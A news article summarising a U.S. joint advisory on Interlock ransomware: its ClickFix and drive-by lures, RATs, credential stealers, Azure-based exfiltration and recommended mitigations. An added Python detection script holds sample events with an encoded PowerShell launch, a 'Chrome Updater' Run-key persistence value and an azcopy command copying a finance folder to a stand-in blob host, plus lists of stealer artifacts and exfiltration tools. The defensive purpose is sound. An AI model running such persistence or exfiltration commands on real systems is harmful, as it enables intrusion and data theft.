
U.S. agencies on Tuesday released a joint cybersecurity advisory detailing known Interlock ransomware indicators of compromise and tactics, techniques, and procedures uncovered in recent FBI investigations, as part of an ongoing effort to publish guidance for network defenders that details various ransomware variants and ransomware threat actors. Interlock ransomware was first observed in late September 2024; the advisory aims to help businesses, critical infrastructure operators, and other organizations in North America and Europe defend against ongoing Interlock ransomware threats. 

“FBI maintains these actors target their victims based on opportunity, and their activity is financially motivated. FBI is aware of Interlock ransomware encryptors designed for both Windows and Linux operating systems; these encryptors have been observed encrypting virtual machines (VMs) across both operating systems,” the FBI, Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) said in the advisory. “FBI observed actors obtaining initial access via drive-by download from compromised legitimate websites, which is an uncommon method among ransomware groups.” 

The advisory added that the hackers were also observed using the ClickFix social engineering technique for initial access, in which victims are tricked into executing a malicious payload under the guise of fixing an issue on the victim’s system. “Actors then use various methods for discovery, credential access, and lateral movement to spread to other systems on the network. Interlock actors employ a double extortion model in which actors encrypt systems after exfiltrating data, which increases pressure on victims to pay the ransom to both get their data decrypted and prevent it from being leaked.” 

The agencies detailed that the Interlock actors leverage a double extortion model, in which they both encrypt and exfiltrate victim data. Ransom notes do not include an initial ransom demand or payment instructions; instead, victims are provided with a unique code and are instructed to contact the ransomware group via a .onion URL through the Tor browser. 

To date, Interlock actors have been observed encrypting VMs, leaving hosts, workstations, and physical servers unaffected; however, this does not mean they will not expand to these systems in the future. To counter Interlock actors’ threat to VMs, enterprise defenders should implement robust endpoint detection and response (EDR) tooling and capabilities.

The FBI has observed Interlock actors obtaining initial access via drive-by download from compromised legitimate websites, an atypical method for ransomware actors. Interlock ransomware methods for initial access have previously disguised malicious payloads as fake Google Chrome or Microsoft Edge browser updates, though a cybersecurity company recently reported a shift to payload filenames masquerading as updates for common security software. 

In some instances, the FBI has observed Interlock actors using the ClickFix social engineering technique, in which unsuspecting users are prompted to execute a malicious payload by clicking a fake Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA). The CAPTCHA contains instructions for users to open the Windows Run window, paste the clipboard contents, and then execute a malicious Base64-encoded PowerShell process. 

Based on FBI investigations, the fake Google Chrome browser executable functions as a remote access trojan (RAT) designed to execute a PowerShell script that drops a file into the Windows Startup folder. From there, the file is designed to run the RAT every time the victim logs in, establishing persistence. FBI also observed instances in which Interlock actors executed a PowerShell command designed to establish persistence via a Windows Registry key modification. To do so, Interlock actors used a PowerShell command designed to add a run key value named ‘Chrome Updater’ that uses a specific log file as an argument upon user login.

The advisory mentioned that the FBI observed Interlock actors using command and control (C2) applications like Cobalt Strike and SystemBC. Interlock actors also used Interlock RAT and NodeSnake RAT for C2 and executing commands. The FBI also observed that once Interlock actors establish remote control of a compromised system, they use a series of PowerShell commands to download a credential stealer (cht[dot]exe) and keylogger binary (klg[dot]dll). 

According to open source reporting, the credential stealer collects login information and associated URLs for victims’ online accounts, while the keylogger dynamic link library (DLL) logs users’ keystrokes in a file named conhost[dot]txt. 

The advisory said that, as of February this year, private cybersecurity analysts had also observed Interlock ransomware infections executing different versions of information stealers, including Lumma Stealer and Berserk Stealer, to harvest credentials for lateral movement and privilege escalation. These hackers leverage compromised credentials and Remote Desktop Protocol (RDP) to move between systems. They also use tools like AnyDesk to enable remote connectivity and PuTTY to assist with lateral movement. Apart from stealing users’ online credentials, Interlock actors have compromised domain administrator accounts, possibly by using a Kerberoasting attack to gain additional privileges. 

Interlock actors leverage Azure Storage Explorer (StorageExplorer[dot]exe) to navigate victims’ Microsoft Azure Storage accounts before exfiltrating data. According to open source reporting, Interlock actors execute AzCopy to exfiltrate data by uploading it to the Azure storage blob. Interlock actors also exfiltrate data over file transfer tools, including WinSCP.
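The behaviours the advisory lists above (encoded PowerShell launched from the Run dialog in the ClickFix chain, the ‘Chrome Updater’ Run key, the cht.exe/klg.dll/conhost.txt artifacts, and the AzCopy/Storage Explorer/WinSCP exfiltration tools) can be turned into a simple triage check over endpoint process-creation and registry-set logs. The code below is an added example, not code from the advisory or the agencies; the pipe-delimited log format, user paths and the harmless encoded payload are constructed for illustration.

```python
import base64
import re

# Constructed sample payload: encoded the way PowerShell expects (-EncodedCommand takes
# Base64 of UTF-16LE), so the decoder below can be exercised offline.
_PAYLOAD_B64 = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16-le")).decode()

# Constructed events: event type | parent image | image or registry value path | command line or value data.
SAMPLE_EVENTS = [
    f"ProcessCreate|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -w hidden -enc {_PAYLOAD_B64}",
    "ProcessCreate|C:\\Windows\\explorer.exe|C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|chrome.exe --profile-directory=Default",
    "RegistrySet|-|HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Chrome Updater|powershell.exe -File C:\\Users\\alice\\AppData\\Local\\Temp\\update.log",
    "ProcessCreate|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Users\\alice\\AppData\\Roaming\\cht.exe|cht.exe",
    "ProcessCreate|C:\\Windows\\explorer.exe|C:\\Tools\\azcopy.exe|azcopy copy C:\\Finance https://example.blob.core.windows.net/out --recursive",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the common ones.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
INTERLOCK_ARTIFACTS = ("cht.exe", "klg.dll", "conhost.txt")   # names from the advisory
EXFIL_TOOLS = ("azcopy.exe", "storageexplorer.exe", "winscp.exe")  # legitimate tools, review not block


def decode_encoded_command(cmdline):
    """Return the decoded script behind -EncodedCommand, or None if the flag is absent."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def triage(events):
    """Return (rule, detail) findings; ordering follows the input events."""
    findings = []
    for rec in events:
        kind, parent, target, data = rec.split("|", 3)
        low_target = target.lower()
        if kind == "ProcessCreate":
            decoded = decode_encoded_command(data)
            # ClickFix: encoded PowerShell whose parent is explorer.exe (Win+R Run dialog)
            if decoded is not None and parent.lower().endswith("explorer.exe"):
                findings.append(("clickfix_encoded_powershell", decoded))
            if low_target.endswith(INTERLOCK_ARTIFACTS):
                findings.append(("interlock_artifact", target))
            if low_target.endswith(EXFIL_TOOLS):
                findings.append(("exfil_tool_review", data))
        elif kind == "RegistrySet":
            # Persistence: Run key value named "Chrome Updater" (any hive)
            if "\\currentversion\\run\\" in low_target and low_target.endswith("chrome updater"):
                findings.append(("run_key_chrome_updater", data))
    return findings
```

Decoding the payload before alerting lets an analyst see what the Run-dialog command actually does; the exfiltration tools are flagged for review because they are legitimate administrative software.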

The cybersecurity advisory detailed that Interlock actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. “The actors instruct victims to make ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the actors. The actors threaten to publish the victim’s exfiltrated data to their leak site on the Tor network unless the victim pays the ransom demand; the actors have previously followed through on this threat.”

The advisory outlines several actions organizations can take immediately to mitigate the threat of Interlock ransomware. Organizations should prevent initial access by implementing domain name system (DNS) filtering and web access firewalls, and by training users to recognize and report social engineering attempts. They should address known vulnerabilities by ensuring that all operating systems, software, and firmware are fully patched and kept up to date. 

Organizations are also urged to segment their networks to limit lateral movement from an initially infected device to other systems within the same environment. The advisory also recommends enforcing strong identity, credential, and access management policies across the organization, and requiring multifactor authentication for services wherever feasible.

Furthermore, organizations should implement a recovery plan that includes maintaining multiple copies of sensitive data in physically separate and secure locations. All accounts with password logins must follow NIST standards, with long passwords recommended and frequent password changes discouraged. Multifactor authentication should be required wherever possible, especially for webmail, VPNs, and access to critical systems, supported by organization-wide identity and access management policies.

Systems must be kept up to date, with priority given to patching known exploited vulnerabilities on internet-facing infrastructure. Endpoint detection and response (EDR) tools should be deployed across networks, systems, and virtual machines to detect and block lateral movement. Network segmentation is essential to limit ransomware spread, while traffic from unknown or untrusted sources should be filtered to block unauthorized remote access. Organizations should also monitor network activity for anomalies using logging tools that capture all traffic.

Antivirus software must be installed, updated, and configured for real-time detection on all hosts. Administrators should regularly review systems for unrecognized or suspicious accounts and audit user privileges based on the principle of least privilege. Additional protections include disabling unused ports, adding banners to emails from external sources, disabling email hyperlinks, and using time-based access controls, such as just-in-time provisioning, for high-level administrative accounts.

Organizations should allow users to request temporary system access through an automated process to support specific tasks. To reduce risk, command line and scripting capabilities should be disabled, limiting threat actor movement and privilege escalation. Offline backups must be maintained and tested regularly to ensure data can be restored in case of a compromise. All backups should be encrypted, immutable, and comprehensive, covering the organization’s entire data infrastructure.

Commenting on the cybersecurity advisory, Erich Kron, security awareness advocate at KnowBe4, wrote in an emailed statement that “while a fairly new ransomware group, Interlock is working to make a name for themselves. Their use of compromised websites for drive-by malware downloads is not very common in the world of ransomware, but their use of social engineering certainly is. Convincing people to install updates or fixes, really just disguised malware, in ClickFix attacks is not a new concept, as fake updates or antivirus notifications have been around for years.”

“To counter the threat, organizations need to ensure their employees are aware of the campaigns and are taught to spot them, and that they are aware of the real and legitimate process the organization’s I.T. department uses to install patches or updates so they are not tricked into executing malware,” according to Kron. “A comprehensive Human Risk Management program is vital when dealing with human-centric attacks such as this, as is a good endpoint protection platform. Patching machines, browsers, and other software can help limit the ability for malware to launch and for bad actors to move around the network or elevate permissions as well.”

Earlier this month, U.S. security agencies urged critical infrastructure operators to stay alert for possible cyberattacks by Iranian state-sponsored or affiliated threat actors, while also identifying and disconnecting OT (operational technology) and ICS (industrial control system) assets from the public internet. Given current geopolitical tensions, these groups could target U.S. networks and devices in the near term. The agencies also highlighted the heightened risks for defense industrial base (DIB) companies with ties to Israeli research or defense firms.